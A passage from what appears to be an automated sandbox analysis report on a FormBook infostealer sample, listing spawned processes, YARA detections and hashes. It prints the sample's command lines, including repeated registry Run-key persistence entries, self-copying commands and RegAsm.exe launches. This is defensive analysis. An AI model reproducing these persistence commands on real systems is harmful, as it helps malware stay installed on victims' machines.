                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:19
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:08:49:44
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:08:49:46
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:08:49:46
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:08:49:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x190000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:08:49:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x890000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:08:49:49
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0xb80000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:08:49:57
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe"
                                                            Imagebase:0xed0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:29
                                                            Start time:08:49:57
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:08:49:58
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:31
                                                            Start time:08:49:58
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:08:50:00
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:08:50:00
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:08:50:01
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x8e0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:08:50:05
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
                                                            Imagebase:0x7a0000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:08:50:11
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:40
                                                            Start time:08:50:13
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:08:50:13
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6a5670000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:08:50:14
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xa00000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:08:50:16
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0x140000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:08:50:19
                                                            Start date:23/07/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:08:50:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:08:50:22
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:08:50:23
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:08:50:25
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:08:50:25
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:08:50:26
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xea0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:08:50:26
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
                                                            Imagebase:0xf60000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:54
                                                            Start time:08:50:33
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:55
                                                            Start time:08:50:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:56
                                                            Start time:08:50:35
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:57
                                                            Start time:08:50:36
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x980000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:58
                                                            Start time:08:50:42
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xd10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:61
                                                            Start time:08:50:47
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
                                                            Imagebase:0xa30000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:63
                                                            Start time:08:50:50
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
                                                            Imagebase:0xa10000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:64
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:65
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:66
                                                            Start time:08:50:54
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:67
                                                            Start time:08:50:56
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:68
                                                            Start time:08:50:56
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:69
                                                            Start time:08:50:57
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xa00000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:70
                                                            Start time:08:51:04
                                                            Start date:23/07/2024
                                                            Path:C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
                                                            Imagebase:0x9b0000
                                                            File size:33'792 bytes
                                                            MD5 hash:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 13%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:71
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:72
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
